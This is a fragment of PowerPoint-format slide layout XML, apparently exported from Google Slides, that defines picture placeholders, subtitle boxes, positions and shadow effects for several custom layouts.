          <p:cNvPr id="669" name="Google Shape;669;p36"/>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70" name="Google Shape;670;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="671" name="Google Shape;671;p36"/>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72" name="Google Shape;672;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>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6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="673" name="Shape 673"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p37"/>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76" name="Google Shape;676;p3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77" name="Google Shape;677;p3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78" name="Google Shape;678;p3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79" name="Google Shape;679;p3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80" name="Google Shape;680;p3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1" name="Google Shape;681;p37"/>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2" name="Google Shape;682;p37"/>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7"/>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7"/>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7"/>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7"/>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7"/>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8" name="Google Shape;688;p37"/>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89" name="Google Shape;689;p37"/>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0" name="Google Shape;690;p37"/>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1" name="Google Shape;691;p37"/>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92" name="Google Shape;692;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="693" name="Google Shape;693;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="694" name="Google Shape;694;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="695" name="Google Shape;695;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="696" name="Google Shape;696;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="697" name="Google Shape;697;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577804"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ay)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="698" name="Shape 698"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Google Shape;699;p38"/>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1" name="Google Shape;701;p3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02" name="Google Shape;702;p3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03" name="Google Shape;703;p3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04" name="Google Shape;704;p3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05" name="Google Shape;705;p3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6" name="Google Shape;706;p38"/>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07" name="Google Shape;707;p38"/>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3" name="Google Shape;713;p38"/>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4" name="Google Shape;714;p38"/>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5" name="Google Shape;715;p38"/>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6" name="Google Shape;716;p38"/>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17" name="Google Shape;717;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="718" name="Google Shape;718;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="719" name="Google Shape;719;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="720" name="Google Shape;720;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="721" name="Google Shape;721;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722" name="Google Shape;722;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>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Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="723" name="Shape 723"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="Google Shape;724;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141275" y="123782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6" name="Google Shape;726;p39"/>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27" name="Google Shape;727;p3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28" name="Google Shape;728;p3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29" name="Google Shape;729;p3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30" name="Google Shape;730;p39"/>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1" name="Google Shape;731;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="12746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2" name="Google Shape;732;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="182890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1141350" y="24199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1141350" y="30110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1141275" y="3602150"/>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1141350" y="4193275"/>
            <a:ext cx="7728300" cy="48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txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="184885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8" name="Google Shape;738;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12200" y="24399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9" name="Google Shape;739;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12250" y="30310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0" name="Google Shape;740;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="3622100"/>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41" name="Google Shape;741;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="4236125"/>
            <a:ext cx="9168600" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="1417300"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42" name="Google Shape;742;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;743;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="744" name="Google Shape;744;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="745" name="Google Shape;745;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="Google Shape;746;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="747" name="Google Shape;747;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577805" cy="446400"/>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7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="748" name="Shape 748"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="749" name="Google Shape;749;p40"/>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0"/>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1" name="Google Shape;751;p40"/>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52" name="Google Shape;752;p40"/>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3" name="Google Shape;753;p4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54" name="Google Shape;754;p40"/>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55" name="Google Shape;755;p40"/>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6" name="Google Shape;756;p40"/>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7" name="Google Shape;757;p40"/>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0"/>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59" name="Google Shape;759;p40"/>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0"/>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1" name="Google Shape;761;p40"/>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0"/>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3" name="Google Shape;763;p40"/>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0"/>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5" name="Google Shape;765;p40"/>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0"/>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67" name="Google Shape;767;p40"/>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0"/>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69" name="Google Shape;769;p40"/>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70" name="Google Shape;770;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="771" name="Google Shape;771;p40"/>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772" name="Google Shape;772;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="773" name="Google Shape;773;p40"/>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774" name="Google Shape;774;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1390" l="0" r="0" t="1380"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Google Shape;775;p40"/>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37" name="Shape 37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;38;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" rotWithShape="0" algn="bl" dir="5400000" dist="19050">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;39;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="3807100"/>
            <a:ext cx="8596200" cy="1062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 name="Google Shape;40;p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rotWithShape="0" algn="bl" dir="5400000" dist="19050">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Google Shape;41;p5"/>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42" name="Google Shape;42;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274800" y="3982500"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="1188700" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">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43" name="Google Shape;43;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="4319775"/>
            <a:ext cx="8344500" cy="319200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="1188700" wrap="square" tIns="9125">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">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4" name="Google Shape;44;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1828800"/>
            <a:ext cx="8595300" cy="1248000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="457200" lIns="2880350" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="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5" name="Google Shape;45;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="3447025"/>
            <a:ext cx="8344500" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="3200400" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="9125">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">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6" name="Google Shape;46;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206300" y="4868750"/>
            <a:ext cx="8663400" cy="185700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="0" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">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7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="776" name="Shape 776"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;p41"/>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1"/>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79" name="Google Shape;779;p41"/>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780" name="Google Shape;780;p41"/>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81" name="Google Shape;781;p41"/>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82" name="Google Shape;782;p41"/>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783" name="Google Shape;783;p41"/>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4" name="Google Shape;784;p41"/>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5" name="Google Shape;785;p41"/>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1"/>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7" name="Google Shape;787;p41"/>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1"/>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9" name="Google Shape;789;p41"/>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1"/>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1" name="Google Shape;791;p41"/>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1"/>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3" name="Google Shape;793;p41"/>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1"/>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5" name="Google Shape;795;p41"/>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1"/>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7" name="Google Shape;797;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="798" name="Google Shape;798;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
